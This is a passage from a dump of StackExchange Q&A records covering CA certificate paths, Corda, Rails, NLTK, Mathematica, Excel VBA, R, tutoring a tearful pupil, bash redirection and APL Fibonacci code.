method","dup_signals":{}},"subset":"stackexchange"} +{"text":"\/usr\/share vs \/usr\/local\/share: Where to install CA certs?\n\nQuestion: I have a VM and I want to install a CA cert on it. In other posts, some recommended copying the cert file into <code>\/usr\/share\/ca-certificates<\/code> and some recommended <code>\/usr\/local\/share\/ca-certificates\/<\/code>.\nI was wondering how are they different and which one I should use.\nAnswer: Actually the answer is in man update-ca-certificates\n\n\/usr\/local\/share\/ca-certificates - all are automatically treated as trusted\n\/usr\/share\/ca-certificates - the ones that should be trusted are selected within the file \/etc\/ca-certificates.conf\n\nMore details in this answer and its comments (and the other answers too):\nhttps:\/\/superuser.com\/questions\/437330\/how-do-you-add-a-certificate-authority-ca-to-ubuntu\/437377#437377\nAnswer: This https:\/\/en.wikipedia.org\/wiki\/Filesystem_Hierarchy_Standard should be helpful:\n\/usr\/local:\n\nTertiary hierarchy for local data, specific to this host. Typically has further subdirectories, e.g., bin, lib, share\nHistorically and strictly according to the standard, \/usr\/local is for data that must be stored on the local host (as opposed to \/usr, which may be mounted across a network). Most of the time \/usr\/local is used for installing software\/data that are not part of the standard operating system distribution (in such case, \/usr would only contain software\/data that are part of the standard operating system distribution). It is possible that the FHS standard may in the future be changed to reflect this de facto convention.\n\n\/usr\/share:\n\nArchitecture-independent (shared) data.\n\nSo I would use the <code>\/usr\/local<\/code> option.\nAnswer: It all depends on how you're going to use the certificate, and with which application. Read the documentation for that application, and it should tell you where to install your certificate.\nOr pick one, test, pick the other, test.\n","meta":{"source":"askubuntu","title":"\/usr\/share vs \/usr\/local\/share: Where to install CA certs?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I find out what the printed numbers mean on the back of an older photo?\n\nQuestion: I have two color photos from Crete, Greece. Maybe around the 1960-70's? The size of the photo is about 3-1\/2\" x 5\". I believe it had a white border but I think someone trimmed it. There is only a long number that is printed almost the full width (about 2-3\/8\" across): 034020540 and the other photo 0341001(0, 6 or 8)2. With spaces between each number. How can the photo be dated closely? Thank you.\nAnswer: These numbers were probably added by the company that printed the photographs. Their purpose is usually to record which job the prints belong to, where a \"job\" is a single film's development and printing. With hundreds or thousands of films being processed each day in an automated plant, tracking numbers were very helpful if there was any mix-up. The prints were put into paper wallets by hand at the end of processing, and mix-ups were possible there, as well as if there were problems in the automated parts of the process.\nThe numbering scheme would be specific to the company that did the work. Using it for dating would require identifying the company, it still being in existence and having all its old records, and being willing to go to the trouble of looking them up. Since many photo processing companies have gone out of business with the rise of digital photography, the odds of success are not good.\nSource: observations from working in a camera shop in the 1970s.\n","meta":{"source":"history.stackexchange","title":"How can I find out what the printed numbers mean on the back of an older photo?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to run corda kotlin example correctly\n\nQuestion: Problem:\nI am trying Corda official documentation hello word application. After Deploying CorDapp I issued \n<code>start IOUFlow iouValue: 99, otherParty: \"O=PartyB,L=New York,C=US\"\n<\/code>\nThis command on Party A. After doing that I tried to check the ledger state by issuing this command on Party A and B. \n<code>run vaultQuery contractStateType: com.template.states.IOUState\n<\/code>\nBut it gives the same output as the notary like this.\n<code>states: []\nstatesMetadata: []\ntotalStatesAvailable: -1\nstateTypes: \"UNCONSUMED\"\notherResults: []\n<\/code>\nBut Output should be like this.\n<code>states:\n- state:\n data:\n value: 99\n lender: \"C=GB,L=London,O=PartyA\"\n borrower: \"C=US,L=New York,O=PartyB\"\n participants:\n - \"C=GB,L=London,O=PartyA\"\n - \"C=US,L=New York,O=PartyB\"\n contract: \"com.template.contract.IOUContract\"\n notary: \"C=GB,L=London,O=Notary\"\n encumbrance: null\n constraint:\n attachmentId: \"F578320232CAB87BB1E919F3E5DB9D81B7346F9D7EA6D9155DC0F7BA8E472552\"\n ref:\n txhash: \"5CED068E790A347B0DD1C6BB5B2B463406807F95E080037208627565E6A2103B\"\n index: 0\nstatesMetadata:\n- ref:\n txhash: \"5CED068E790A347B0DD1C6BB5B2B463406807F95E080037208627565E6A2103B\"\n index: 0\n contractStateClassName: \"com.template.state.IOUState\"\n recordedTime: 1506415268.875000000\n consumedTime: null\n status: \"UNCONSUMED\"\n notary: \"C=GB,L=London,O=Notary\"\n lockId: null\n lockUpdateTime: 1506415269.548000000\ntotalStatesAvailable: -1\nstateTypes: \"UNCONSUMED\"\notherResults: []\n<\/code>\nThis is my build.gradle task deployNodes.\n<code>task deployNodes(type: net.corda.plugins.Cordform, dependsOn: ['jar']) {\n nodeDefaults {\n projectCordapp {\n deploy = true\n }\n cordapp project(':contracts')\n cordapp project(':workflows')\n }\n directory \".\/build\/nodes\"\n node {\n name \"O=Notary,L=London,C=GB\"\n notary = [validating : true]\n p2pPort 10002\n rpcSettings {\n address(\"localhost:10003\")\n adminAddress(\"localhost:10043\")\n }\n }\n node {\n name \"O=PartyA,L=London,C=GB\"\n p2pPort 10005\n rpcSettings {\n address(\"localhost:10006\")\n adminAddress(\"localhost:10046\")\n }\n rpcUsers = [[ user: \"user1\", \"password\": \"test\", \"permissions\": [\"ALL\"]]]\n }\n node {\n name \"O=PartyB,L=New York,C=US\"\n p2pPort 10008\n rpcSettings {\n address(\"localhost:10009\")\n adminAddress(\"localhost:10049\")\n }\n rpcUsers = [[ user: \"user1\", \"password\": \"test\", \"permissions\": [\"ALL\"]]]\n }\n\n}\n<\/code>\nI tried a lot to find out a solution to this problem on the internet but I was unable to do so as I am a newcomer to Corda. Can someone help me to solve this issue? Thank you very much.\nComment: When you ran the flow, did it complete successfully? Did you see the returned transaction hash on the screen? Also did you have all the 3 nodes (PartyA, PartyB, and Notary) up?\nComment: @AdelRustum nothing was there on the screen after starting the flow. Yeah, all three server terminals are running.\nComment: If you didn't get anything on the screen, then the flow didn't complete. Check the logs of your nodes (inside `build\/nodes\/PartyA\/logs`). You can also start the node in debug mode (https:\/\/docs.corda.net\/node-commandline.html#enabling-remote-debugging) and put breakpoints on your code to see where it's failing.\nComment: @AdelRustum Thank you very much. I got error on logs after checking it. After solving that issue my problem solved.\nComment: Ok, I'll add my remark as an answer; please accept it to mark the question as answered.\nAnswer: If you didn't get anything on the screen, then the flow didn't complete.\nCheck the logs of your nodes (inside <code>build\/nodes\/PartyA\/logs<\/code>).\nYou can also start the node in debug mode (https:\/\/docs.corda.net\/node-commandline.html#enabling-remote-debugging) and put breakpoints on your code to see where it's failing.\n","meta":{"source":"stackoverflow","title":"How to run corda kotlin example correctly","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rails error : \"Unknown key: :dependant\"\n\nQuestion: When saving a form into database, I get the following error message : \nUnknown key: :dependant\nI am not sure why\nThe model in question I try to save data to is called Museum. This model is lnked to another model called Exhibition. \nHere are the two models :\n<code>class Museum < ActiveRecord::Base\n has_many :exhibitions, dependant: :destroy\nend\n<\/code>\nand Exhibition model \n<code>class Exhibition < ActiveRecord::Base\n belongs_to :museum\nend\n<\/code>\nMy Museum controller : \n<code>class MuseumsController < ApplicationController\n\ndef show\n @museum = Museum.find(params[:id])\n @museum.address = @museum.streetnumber + \" \" + @museum.streetnumbercomplement + \" \" + @museum.street + \" \" + @museum.adresscomplement + \",\" + @museum.postalcode + \" \" + @museum.city + \" \" + @museum.citycomplement\nend\n\ndef new\nend\n\ndef create\n @museum = Museum.new(museum_params)\n @museum.save\n redirect_to @museum\nend\n\nprivate\n\ndef museum_params\n params.require(:museum).\n permit(:name,:streetnumber, :streetnumbercomplement,\n :street, :adresscomplement, :postalcode, :city,\n :description, :linktowebsite, :price, :citycomplement)\n end\nend\n<\/code>\nI am building the two models controllers alltogether and have already added onto the Exhibiton tables some entries. Those entries have no reference to any Museum entry and the foreign key is probably not populated.\nShould the problem of the Exhibiton entry not refering to any museums entry cause the problem ? \nIn this case should my Rails application writing be more linear ?\n(I'd like to mention that I am mimicking Getting Started tutorial and developping by trial and error. Hope no previous errors are not snowballing now..)\nAnswer: Possible Typo:\ndependant ---> dependent\n","meta":{"source":"stackoverflow","title":"Rails error : \"Unknown key: :dependant\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"Stanford Universal Dependencies on Python NLTK\n\nQuestion: Is there any way I can get the Universal dependencies using python, or nltk?I can only produce the parse tree.\nExample:\nInput sentence:\n<code>My dog also likes eating sausage.\n<\/code>\nOutput:\n<code>Universal dependencies\n\nnmod:poss(dog-2, My-1)\nnsubj(likes-4, dog-2)\nadvmod(likes-4, also-3)\nroot(ROOT-0, likes-4)\nxcomp(likes-4, eating-5)\ndobj(eating-5, sausage-6)\n<\/code>\nComment: See https:\/\/pypi.python.org\/pypi\/PyStanfordDependencies \/ http:\/\/stackoverflow.com\/a\/29614388\/1118542 -- PyStanfordDependencies can do Universal Dependencies now.\nAnswer: Wordseer's stanford-corenlp-python fork is a good start as it works with the recent CoreNLP release (3.5.2). However it will give you raw output, which you need manually transform. For example, given you have the wrapper running:\n<code>>>> import json, jsonrpclib\n>>> from pprint import pprint\n>>>\n>>> server = jsonrpclib.Server(\"http:\/\/localhost:8080\")\n>>>\n>>> pprint(json.loads(server.parse('John loves Mary.'))) # doctest: +SKIP\n{u'sentences': [{u'dependencies': [[u'root', u'ROOT', u'0', u'loves', u'2'],\n [u'nsubj',\n u'loves',\n u'2',\n u'John',\n u'1'],\n [u'dobj', u'loves', u'2', u'Mary', u'3'],\n [u'punct', u'loves', u'2', u'.', u'4']],\n u'parsetree': [],\n u'text': u'John loves Mary.',\n u'words': [[u'John',\n {u'CharacterOffsetBegin': u'0',\n u'CharacterOffsetEnd': u'4',\n u'Lemma': u'John',\n u'PartOfSpeech': u'NNP'}],\n [u'loves',\n {u'CharacterOffsetBegin': u'5',\n u'CharacterOffsetEnd': u'10',\n u'Lemma': u'love',\n u'PartOfSpeech': u'VBZ'}],\n [u'Mary',\n {u'CharacterOffsetBegin': u'11',\n u'CharacterOffsetEnd': u'15',\n u'Lemma': u'Mary',\n u'PartOfSpeech': u'NNP'}],\n [u'.',\n {u'CharacterOffsetBegin': u'15',\n u'CharacterOffsetEnd': u'16',\n u'Lemma': u'.',\n u'PartOfSpeech': u'.'}]]}]}\n<\/code>\nIn case you want to use dependency parser, you can reuse NLTK's DependencyGraph with a bit of effort\n<code>>>> import jsonrpclib, json\n>>> from nltk.parse import DependencyGraph\n>>>\n>>> server = jsonrpclib.Server(\"http:\/\/localhost:8080\")\n>>> parses = json.loads(\n... server.parse(\n... 'John loves Mary. '\n... 'I saw a man with a telescope. '\n... 'Ballmer has been vocal in the past warning that Linux is a threat to Microsoft.'\n... )\n... )['sentences']\n>>>\n>>> def transform(sentence):\n... for rel, _, head, word, n in sentence['dependencies']:\n... n = int(n)\n...\n... word_info = sentence['words'][n - 1][1]\n... tag = word_info['PartOfSpeech']\n... lemma = word_info['Lemma']\n... if rel == 'root':\n... # NLTK expects that the root relation is labelled as ROOT!\n... rel = 'ROOT'\n...\n... # Hack: Return values we don't know as '_'.\n... # Also, consider tag and ctag to be equal.\n... # n is used to sort words as they appear in the sentence.\n... yield n, '_', word, lemma, tag, tag, '_', head, rel, '_', '_'\n...\n>>> dgs = [\n... DependencyGraph(\n... ' '.join(items) # NLTK expects an iterable of strings...\n... for n, *items in sorted(transform(parse))\n... )\n... for parse in parses\n... ]\n>>>\n>>> # Play around with the information we've got.\n>>>\n>>> pprint(list(dgs[0].triples()))\n[(('loves', 'VBZ'), 'nsubj', ('John', 'NNP')),\n (('loves', 'VBZ'), 'dobj', ('Mary', 'NNP')),\n (('loves', 'VBZ'), 'punct', ('.', '.'))]\n>>>\n>>> print(dgs[1].tree())\n(saw I (man a (with (telescope a))) .)\n>>>\n>>> print(dgs[2].to_conll(4)) # doctest: +NORMALIZE_WHITESPACE\nBallmer NNP 4 nsubj\nhas VBZ 4 aux\nbeen VBN 4 cop\nvocal JJ 0 ROOT\nin IN 4 prep\nthe DT 8 det\npast JJ 8 amod\nwarning NN 5 pobj\nthat WDT 13 dobj\nLinux NNP 13 nsubj\nis VBZ 13 cop\na DT 13 det\nthreat NN 8 rcmod\nto TO 13 prep\nMicrosoft NNP 14 pobj\n. . 4 punct\n<BLANKLINE>\n<\/code>\nSetting up CoreNLP is not that hard, check http:\/\/www.eecs.qmul.ac.uk\/~dm303\/stanford-dependency-parser-nltk-and-anaconda.html for more details.\n","meta":{"source":"stackoverflow","title":"Stanford Universal Dependencies on Python NLTK","dup_signals":{}},"subset":"stackexchange"} +{"text":"Best solution to insert text at defined position into image\n\nQuestion: What is the best solution to insert text at defined poition into image?\nI saw this question\/answer but it does not help me for my examples below.\nI tried the following and find some strange behaviour:\n<code>image = Image[Array[0 &, {200, 400}]];\n<\/code>\nExample 1:\n<code>text = \"This is a very long text\";\ntextImage = \n textImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30]];\ncomposedImage = Show[image, textImage]\n<\/code>\n\nExample 2:\n<code>text = \"This is a very long text This is a very long text This is a very long text This is a very long text\";\ntextImage = \n textImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30]];\ncomposedImage = Show[image, textImage]\n<\/code>\nHere the text is cropped.\n\nExample 3:\n<code>text = \"This is a very long text This is a very long text This is a very long text This is a very long text This is a very long text\";\ntextImage = \n textImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30]];\ncomposedImage = Show[image, textImage]\n<\/code>\nI don't understand why here the text is wrapped but not left aligned.\nIt seems that when the text exceeds a certain length (probably depending on text size) this happens.\n\nWhat would you propose to insert text into an Image? \nComment: use the option `LineIndent -> 0` in `Style`. Default value is `1.`.\nComment: mrz, to get a single line use the option `LineBreakWithin -> False` in `Style`.\nComment: @kglr: If I put `LineIndent -> 0` in example 3 I get 2 rows now left aligned and wrapped. How can I have a single line although it is too long and not everything seen? In general: I believe that my way how I insert text is not the correct one. There must be a more elegant solution, where I also can set the position.\nComment: @kglr: Merry Christmas and thank you for your help.\nComment: mrz, Merry Christmas to you too.\nAnswer: To supress line breaks you can use the option <code>LineBreakWithin -> False<\/code> in <code>Style<\/code>:\n<code>text = \"This is a very long text This is a very long text This is a very long text This is a\n very long text This is a very long text\";\ntextImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30, LineBreakWithin -> False]];\ncomposedImage = Show[image, textImage]\n<\/code>\n\nTo prevent indents use the option <code>LineIndent -> 0<\/code>:\n<code>textImage = Rasterize[Style[text, FontFamily -> \"Calibri\", 30, LineIndent -> 0]]\ncomposedImage = Show[image, textImage]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Best solution to insert text at defined position into image","dup_signals":{}},"subset":"stackexchange"} +{"text":"Excel Copy Words Which Start with \"Acc\" From Column A to B\n\nQuestion: Excel sheet\n\nI would like a an automation developed.\nStarting from A2 move contents of A2 into B3 and B4 then move contents A5 into B6 to B8, then A9 into B10 and so forth to the end \nof the records\nThe logic is if cell AX has string starting with \"Acc\" move contents into cell BX+1 If next cell AX+2 is not starting with \"Acc\" \nthen copy cell BX above and so forth till end of the data.\nStop when cell AX is blank.\nHere is my code i tried but its not working\n<code>Private Sub CommandButton1_Click()\n\n Dim recSheet As Worksheet\n Set recSheet = ThisWorkbook.Sheets(\"original\")\n\nloop through column A and find words\n'which starts with \"Acc\" if next cell is not starting with \"Acc\"\n\nLastRow = recSheet.Cells(Rows.Count, \"A\").End(xlUp).Row\nNextRow = recSheet.Cells(Rows.Count, \"A\").End(xlUp).Row + 1\n\n For i = 2 To LastRow\n\n If Range(\"A\" & i).Value = \"Acc*\" And NextRow <> \"Acc*\" Then\n Range(\"A\" & i).Select\n Selection.Cut\n\n Range(\"B\" & i\").Select\n ActiveSheet.Paste\n\n End If\nNext i\nEnd Sub\n<\/code>\nComment: Please explain how it is \"not working\". Does it do something other than expected? Does it do nothing? Does it cause an error message (if so, what is it)? Does Excel crash? Does Excel become unresponsive?\nComment: It should be \"cut\" not \"copy\"\nComment: nothing is happening and no errors too\nComment: You should add `Option Explicit` at the top of your module and `Dim` (declare) your variables. If you do that you will get an error at `NextRow <> \"Acc*\"` because you are trying to compare a number with a string.\nComment: i have added Option Explicit and now i have an error \" Variable not defined\"\nAnswer: Try with below code\n<code>Private Sub CommandButton1_Click()\n Dim texttocopy as String\n Dim lastrow As Long\n Dim i As Long\n Dim recSheet As Worksheet\n Set recSheet = ThisWorkbook.Sheets(\"original\")\n lastrow = recSheet.Cells(Rows.Count, \"A\").End(xlUp).Row\n For i = 2 To lastrow\n texttocopy = Range(\"A\" & i).Value\n If Range(\"A\" & i).Value Like \"Acc*\" And Not Range(\"A\" & i + 1).Value Like \"Acc*\" Then\n i = i + 1\n Do While Not Range(\"A\" & i).Value Like \"Acc*\" And Range(\"A\" & i).Value <> \"\"\n' Range(\"A\" & i).Select\n' Selection.Cut\n' Range(\"B\" & i).Select\n' ActiveSheet.Paste\n Range(\"B\" & i).Value = texttocopy\n If i >= lastrow Then\n Exit For\n Else\n i = i + 1\n End If\n Loop\n i = i - 1\n End If\n Next i\nEnd Sub\n<\/code>\nComment: @RobinsHarawa there is a `Not` missing in the second condition so maybe there are simply no matches.\nComment: @RobinsHarawa can you please show some screen shots of whats your expected result?\nComment: i have a screen short but i don't know to upload it here in the comment box\nComment: There is an edit option available at below questions . go through there and you can able to upload your screenshot by cilcking the Image icon (available at 5th left to right).\nComment: sorry to bother you but i can't find where you are talking about. your email please i can attach it and it ll be easy\nComment: Not enough Robin i understood your requirment. Will post within a second.\nComment: i have seen it and i have added \"Option Explicit\" but nothing is happening.\nNote: I have added \nDim LastRow As Integer\nDim i As Integer\nbecause there was compile error \"type missmatch\"\nComment: Nan Avan Illai-the code is able to cut and paste but it is getting dates as well. I only need those words which starts with \"Acc\" to be move from column A to B so much that i end up with, 25-09-2013 Account Code 190..\nComment: it first gave an error \"undefined variable\" then i declared \"texttocopy\" as Range. upon doing this i get this error \"Run-time error, object variable or with block variable not set\"\nComment: declare texttocopy as string\nComment: Thank you very much Nan Avan Illai it has worked the way i wanted\nComment: Don't forget to mark as answer and useful by accepting tick symbol in my post and up arrow for useful\n","meta":{"source":"stackoverflow","title":"Excel Copy Words Which Start with \"Acc\" From Column A to B","dup_signals":{}},"subset":"stackexchange"} +{"text":"Creating Subsets of data with multiple where\/between statements\n\nQuestion: I have a dataset which consists of 2 days in 2 different months and the same time periods. It shows how many occupants were in a house during the time. I want to separate the data by date, time period AND houseid.\nSo i want to get all the records where the date is 01-02-2010, between the time periods 14:00:00 - 19:00:00 where houseid is N60421A. At the moment data.type is stored as characters except for occupants which is numeric.\nhttp:\/\/www.sharecsv.com\/s\/aa6d4dc34acfbaf73ada1d2c8764b888\/modecsv.csv\nAtm i have tried this but i seem to get no results\n<code>data2 = subset(data, dayMonthYear == \"01\/02\/2010\" && Houses == \"N60421A\")\n<\/code>\nIn SQL i would do something like\n<code>SELECT *\nFrom data\nwhere dayMonthYear == \"01\/02\/2010\"\nAND houses == \"N60421A\"\nAND time > 14:00:00\nAND time < 19:00:00\n<\/code>\nAnswer: This should work for you...\n<code>#Combine date and time into a new POSIXct variable \"Time1\"\ndata$Time1 <- as.POSIXct(paste(data$dayMonthYear, data$Time), format=\"%d\/%m\/%Y %H:%M:%S\")\n\n#Subset \ndata2 <-subset(data, dayMonthYear == \"01\/02\/2010\" & Houses == \"N60421A\" & strftime(Time1, \"%H\") %in% c('14','15','16','17','18','19'))\n<\/code>\nYou could also use the \"chron\" package and standard R subsetting...\n<code>#Approach 2\n#Load Library\nlibrary(chron)\n\n#Convert Time from factor while creating new variable \"Time2\"\ndata$Time2 <- chron(times = as.character(data$Time))\n\n#Subset\ndata2 <- data[(data$dayMonthYear == \"01\/02\/2010\" & data$Houses == \"N60421A\" & data$Time2 >= \"14:00:00\" & data$Time2 <= \"19:00:00\" ),]\n<\/code>\nComment: Time1 actually returns N\/A when i look at the data table. Is there not a way to do this without combining the two?\nComment: I'm not sure what the problem is. Can you share your data with dput instead of providing the csv?\nComment: @KHAN I added a second approach that does not combine date and time.\n","meta":{"source":"stackoverflow","title":"Creating Subsets of data with multiple where\/between statements","dup_signals":{}},"subset":"stackexchange"} +{"text":"Advice on how to tutor a twelve year old that starts to cry?\n\nQuestion: I have a new math pupil. She is an emotional 12 year old girl who starts to cry when she doesn't understand something.\nHer father said she is sensitive. I was asked to do more praising and encouraging from her parents.\nI am looking for ways how to provide a better service.\nHave you dealt with a similar situation before? What is the best thing to do?\nComment: Are you a tutor? If so, is this tutoring one-on-one?\nComment: As her father said, she is sensitive. Building rapport looks like a good idea. I asked about her math teacher in school, whether they come in time to the class, how old is the math teacher etc. To get her point of view and to understand how does the whole math thing makes her feel. She doesn't like math. It is too abstract for her.\nComment: Take her shopping. With cash. Addition, multiplication, ratios, percent, estimation. Also a possibility to establish rapport.\nComment: @Joel Reyes Noche: Yes and yes.\nComment: \"It is too abstract for her.\" Then perhaps make it concrete. Counting geometric objects. Kirigami to fold an $n$-pointed star. Etc.\nComment: How often does she cry? If the content is too difficult for her maybe spending more time going over the basics. Be clear that you just want her to make fewer mistakes and understand more of the material, instead of zero errors and total comprehension.\nComment: @okzoomer: So far took place six lessons, she cried twice. She also has gaps in the previous knowledge.\nComment: in addition to setting realistic expectations, it also helps if you review whatever she's missing prior to going over what she's doing in class. (eg if learning subtraction of fractions best to first review subtraction of (postive and negative) integers). The method depends from student to student, but just do more that's keeping her engaged and do less that's keeping her frustrated. If she's getting tense or tired, just take a 3-5 minute water or bathroom or stretching break and continue after.\nAnswer: Empty praise is no good\nDo not give praise when it is not deserved. It is not healthy and does not lead to stronger character or anything else good.\nTasks with no wrong answer\nMaybe, and I am guessing here, the pupil reacts badly to being shown inadequate. Maybe mathematics has always been a subject full of right\/wrong -type exercises: you either get it or you do not, and it is right or wrong.\nHow about trying tasks that are not of this type? There are many sources for these types of questions, but one typical thing is to ask the pupil to make something. Maybe you give an answer and them to create an exercise. Or maybe it is an open exercise with free parameters the pupil can themselves choose.\nThe point here is to reduce the emotional intensity and the matter of winning and losing, showing you are smart or stupid.\nAnswer: Intense emotions surrounding math are not uncommon. Importantly, they tend to \"feed back\" on themselves - the memory of a bad experience with math makes doing math more stressful later, which then creates new bad experiences. So, taking action sooner rather than later will help immensely. Here are some suggestions.\n\nThere's no such thing as being just \"sensitive\". Emotions have a reason; the more you can find out about the reason, the better you can help. What makes this student distressed? Is it when learning something new, or when trying to use something they think they should already know? Are there particular topics that cause more stress than others? Is it starting a problem that causes stress, or does the stress kick in somewhere in the middle? Are word problems a greater stressor? Answers to any of these questions will help you figure out how to help the student.\nAs another answer here pointed out, empty praise is worse than useless. If a student picks up on you praising them for nothing, they won't trust you anymore, and they'll rely on their own judgment of how they're doing - which will always mean feeling bad about their math ability. That said, there is always something to praise honestly. When I'm working with a student in this situation, I'll often praise the process (\"see, setting it up like this was great, it was only later that things went wrong\"), inventiveness (\"well, that didn't turn out right, but it was a really cool way to approach it!\"), and even awareness (\"that's great, being able to spot when you don't know something is a super important skill\").\nLower the stakes. The perception of math as a \"right-answer-or-bust\" field is toxic. In between the right-or-wrong questions, ask questions that don't have clear-cut answers. I'm a fan of process-suggestion questions (\"which of our tools do you guess might help here?\") and even emotion questions (\"what's your gut feeling about this problem? What does that tell you?\").\nModel error-positive thinking. Many students get stressed about math because they feel (often by observation of instructors, stronger students, and popular media) that the \"right\" way to do math is to always be sure of exactly what to do next, never make mistakes, and never run into dead ends. But no one does that. The math I teach is math I've been practicing almost daily for more than a decade, and even I mess up sometimes. Even when I look perfect, it's just because I'm good at noticing and fixing my mistakes in my head before anyone sees them. I've found that it helps to turn off that reflex in myself: let the student see me make mistakes, puzzle over what to do next, or try something that doesn't end up working. In doing so, I can show them the right way to emotionally deal with an error: you welcome it as an opportunity to practice spotting and fixing mistakes.\nGive control, where possible. In my experience, many students think of math as something that happens to them, not something they do. And of course that's stressful - when you feel like you're fending off an attack, why wouldn't you get upset? It can help to provide opportunities for the student to take control of the situation. That can be as simple as giving them a choice about which problem to attempt next, or suggesting multiple ways to solve a problem (e.g., to find $2 \\times 3 \\times 5$, you might ask \"would you rather multiply $2 \\times 3$ first, or start with $2 \\times 5$?\").\nSelf-care is a skill. At 12, many (most?) students are still working on developing their coping mechanisms. Older students might be expected to recognize when they're feeling stressed out and frustrated, and to know what steps to take to get back on-track. But a 12-year-old probably needs help with that. Practice naming emotions, and offering simple solutions. For example: \"It seems like you're getting frustrated. Do you want to take a break for a few minutes?\" Or, \"You seem upset about this problem. Do you want to talk about why?\"\nAnswer: Her parents say she is sensitive and needs praise and encouragement, but you say she has gaps in her knowledge.\nSome suggestions:\nAssess what she knows and doesn't know. Give her an oral written assessment of the skills she needs. Make sure she understands that you need to know what to teach her.\nMake the parents your partners. Tell them you are happy to encourage and praise her, but she also has to learn the material, which is hard because she has gaps. Tell them about your plan to assess her and ask them to encourage her to approach the assessment without worry so that you can best figure out how to teach her. Ask them to encourage her to be comfortable saying I don't know and also to be comfortable when making mistakes.\nGive her opportunities to succeed. This will be easier to do once you have assessed her. Ask her easy questions that she can answer.\nPraise and encouragement should be for effort not for success.\nAnswer: Both Amy B and Reese Johnston have given some excellent suggestions but make sure you pay attention so that the student doesn't use tears (even unconsciously) to avoid work or get spoonfed answers. Without observation or more details, I cannot tell if the parents are simply accommodating a more sensitive child or have fallen into the habit of removing anything that frustrates the child.\nAnswer: Let me clarify the situation: you are her teacher, not her parent. This makes it your job to explain matter to her, and it's the job of the parents to prepare her for that.\nAs you have stated:\n\nHer father said she is sensitive. I was asked to do more praising and encouraging from her parents.\n\nThis is not your job! Not at all!\nLet's face it: crying is an enormous time and focus waster: when a person starts crying, he or she looses his or her focus for quite a long time, so it should happen as less as possible.\nI remember that, also at the age of 12, during one lesson, I've been crying too. As far as I know, the teacher did not even speak to me, he just let it happen, and I never had any bad feelings towards that teacher for that.\nI have the impression that the parents are not dealing well with their sensitive child and let the burden on you, and that's not the way education is to be done: it's your job to deliver the matter and it's their job to make her ready for dealing with that matter.\nOh, if you think I'm being harsh here, just think about this situation: I imagine you have a regular class of about 20 students, and you are planning of adapting yourself to the \"special\" needs of one single student. Another student might notice that and invent a \"special\" need for him- or herself too, do you see the snowball effect coming? ... at the end you'll be dealing with \"special\" needs that much that you won't be able to teach your class anymore.\nDoes this mean there is nothing you can do? Well, the easiest you can do is increase praising of every student in your class. Like this, her need to praising might be fulfilled (or at least reduced) and you don't make an exception for one student. But don't go further than that.\n","meta":{"source":"matheducators.stackexchange","title":"Advice on how to tutor a twelve year old that starts to cry?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Bash : behaviors of the redirections\n\nQuestion: Question\nPlease confirm if my understandings are correct. Or correct if wrong and pointers to related technical article and documents would be appreciated.\n\nThese are doing the same.\n\n<code>ls &>\/tmp\/01.log<\/code>\n<code>ls 2>&1 >\/tmp\/02.log<\/code>\n<code>ls > \/tmp\/03.log 2>&1<\/code>\n<code>ls 2>&1 1>\/tmp\/04.log<\/code>\n\nThe result of 5 will be the same with 1 to 4 on a single core CPU where there will be no multiple execution threads in a process. If it could produce a different result, please help understand what is actually happening in each process and in the kernel.\nFor multi-core CPU environment, would it happen that while a thread on a core is writing to stdout, another thread on another core write to stderr and they could be interleaved?\n\n<code>ls 1>\/tmp\/05.log 2>\/tmp\/05.log<\/code>\n\nBelow could cause errors e.g. stderr tries to write but stdout has not output anything yet.\n<code>ls 1>\/tmp\/05.log 2>>\/tmp\/05.log\n<\/code>\n\nThe same with 1 to 4. \n\n<code>ls 1<&2 > \/tmp\/06.log<\/code>\n\nThe result is the same with 1 to 4, although makes no sense of doing it.\n\n<code>ls 2>&1 | cat<&0>&1 > \/tmp\/07.log<\/code>\n\nResearches\n\nAdvanced Bash-Scripting Guide: Chapter 20. I\/O Redirection\nGNU Bash Reference Manual -3.6 Redirections\nBash One-Liners Explained, Part III: All about redirections\nHow could I remember how to use redirection?\nRead values into a shell variable from a pipe\nAnswer: Number 4 is different. Order matters: First FD 2 is redirected where FD 1 currently points to (by default the terminal, unless another redirection had been set up already in this process or by the parent process), and then FD 1 is redirected to the file.\n","meta":{"source":"stackoverflow","title":"Bash : behaviors of the redirections","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to write N N N .... N using operators (or other things)?\n\nQuestion: Well.. I have started to learn APL since yesterday. I'm watching youtube videos teaching about various symbols from basic, and I'm using NARS2000.\nWhat I want is to print the Fibonacci sequence. I know there's several codes, but since I haven't studied advanced things, I started to write my own code.\nFirst I made this array: \nThe idea is simple : the element at (1,1) in N\u207f is (n+1)th fibonacci sequence.\nWhat I did was:\n\nand\n\nWell, it works. However, if I want 16th term, then I should do\n\nWhat I need is to write arbitary amount of Ns. Of course I know about {rho}. However,\n\n(bottom was cut)\nAnd I noticed that (i 2 2){rho}N and i Ns are different.\n\nWhat operator I should use to do same thing as N N N...N does?\nAnswer: You were almost there. <code>\u2374<\/code> (\"reshape\") is the right operator to use; however, you want it to treat your matrix N not as a matrix, but as a single, scalar element. For this purpose, you wrap it using the \"enclose\" operator <code>\u2282<\/code>:\n<code> 4\u2374\u2282N\n 1 1 1 1 1 1 1 1 \n 1 0 1 0 1 0 1 0\n<\/code>\nIf we wrap this up, we arrive at (e.g.) the following expression:\n<code> \u2191\u00a8+.\u00d7\\16\u2374\u22822 2\u23741 1 1 0\n1 2 3 5 8 13 21 34 55 89 144 233 377 610 987 1597\n<\/code>\n(Allow me one remark, though: by definition, the Fibonacci sequence starts with <code>0<\/code> and <code>1<\/code>.)\nComment: Thank you! I [heard](http:\/\/www.youtube.com\/watch?v=a9xAKttWgP4) about the enclose operator, but I didn't know what that does.\nAnswer: If you want to start with 0 and 1, just use 0 1 1 1 instead of 1 1 1 0\n<code> \u2191\u00a8+.\u00d7\\16\u2374\u22822 2\u23740 1 1 1\n0 1 1 2 3 5 8 13 21 34 55 89 144 233 377 610\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to write N N N .... N using operators (or other 